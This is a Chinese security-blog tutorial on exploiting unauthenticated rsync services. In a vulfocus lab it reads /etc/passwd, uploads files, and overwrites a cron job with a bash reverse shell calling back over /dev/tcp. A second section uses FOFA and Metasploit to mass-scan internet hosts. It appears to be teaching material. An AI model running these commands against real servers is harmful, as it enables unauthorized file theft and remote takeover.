应用协议-Rsync+协议+漏洞批扫

admin 2024年4月4日10:31:40评论5 views字数 1842阅读6分8秒阅读模式

什么是服务?

在服务器操作系统安装的时候,会装了比较多的服务。如我们在安装使用mysq数据库时,默认情况下就会开启mysql服务和服务默认端口3306。这些服务就可能产生漏洞。

服务漏洞测试流程:

应用协议-Rsync+协议+漏洞批扫

协议:

FTP:文件传输协议,默认端口21

RDP:Windows远程桌面协议,默认端口3389

SSH:Linux安全外壳协议,默认端口22

案例演示:rsync-common 未授权访问

rsync是什么?

rsyncLinux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口。

漏洞产生原因:

目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件

使用vulfucos靶场开启漏洞环境

在自己linux服务器输入:rsync rsync://目标ip:端口/判断漏洞是否存在

如果返回模块名列表等内容,说明漏洞存在

应用协议-Rsync+协议+漏洞批扫

漏洞存在,可以读取文件:rsync rsync://123.58.224.8:58725/src/tmp/

应用协议-Rsync+协议+漏洞批扫

应用协议-Rsync+协议+漏洞批扫

还可以进行下载和上传操作:

下载文件:rsync rsync://123.58.224.8:58725/src/etc/passwd ./

应用协议-Rsync+协议+漏洞批扫

上传文件:rsync-avpasswdrsync://123.58.224.8:58725/src/tmp/passwd

应用协议-Rsync+协议+漏洞批扫

应用协议-Rsync+协议+漏洞批扫

还可以尝试获取shell

执行命令:rsync rsync://123.58.224.8:20700/src/etc/crontab /root/cc.txt查看crontab中的内容,发现有一个每17分钟执行一次/etc/cron.hourly文件的定时任务

应用协议-Rsync+协议+漏洞批扫

于是创建一个带有反弹shell命令的文件进行上传,将/etc/cron.hourly文件的内容覆盖

命令:

touch shell

vim shell写入内容:/bin/bash -i >& /dev/tcp/接收shell的服务器地址/5566 0>&1

chmod +x shell        

应用协议-Rsync+协议+漏洞批扫

上传shell文件覆盖/etc/cron.hourly文件内容

命令:rsync-av shell rsync://123.58.224.8:22700/src/etc/cron.hourly

应用协议-Rsync+协议+漏洞批扫

服务器监听设置的5566端口,等待定时任务执行接收反弹shell

应用协议-Rsync+协议+漏洞批扫

案例演示:批量扫描rsync漏洞---Fofaviewer配合Msf

工具Fofaviewer:

利用强大的互联网搜索引擎FoFa,将众多常用的API封装到简洁的UI中,让网络安全专业人士更容易在目标网站上寻找漏洞。

下载地址:https://github.com/wgpsec/fofa_viewer

Msfconsole

msfconsole是一个强大的接口程序。Msfconsole提供了一个一体化的集中控制台。通过msfconsole,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmapsqlmap等,可以直接在msfconsole里面使用。

Centos系统Msf一键安装命令:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb >msfinstall &&chmod755msfinstall &&./msfinstall

java运行工具Fofaviewer,配置fofa账号和key

应用协议-Rsync+协议+漏洞批扫

输入查询条件(漏洞特征),点击查询即可获取目标

应用协议-Rsync+协议+漏洞批扫

将查询到的目标数据导出保存,将ip保存到另一个rsync.txt文件中

安装好msf,输入命令:msfconsole展示工具模块

应用协议-Rsync+协议+漏洞批扫

输入命令:

use auxiliary/scanner/rsync/modules_list进入rsync漏洞扫描模块

show options 查看模块配置方法

set rhosts file:/root/rsync.txt批量扫描,指定字典

set threads 10配置线程

show options再次查看配置情况

应用协议-Rsync+协议+漏洞批扫

模块配置完成,输入命令:run启动扫描。【+】代表有漏洞,【*】没有

应用协议-Rsync+协议+漏洞批扫

挑选一个验证是否存在漏洞

应用协议-Rsync+协议+漏洞批扫

成功列出模块名列表,漏洞存在

原文始发于微信公众号(小黑子安全):应用协议-Rsync+协议+漏洞批扫

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月4日10:31:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   应用协议-Rsync+协议+漏洞批扫http://cn-sec.com/archives/2630011.html

发表评论

匿名网友 填写信息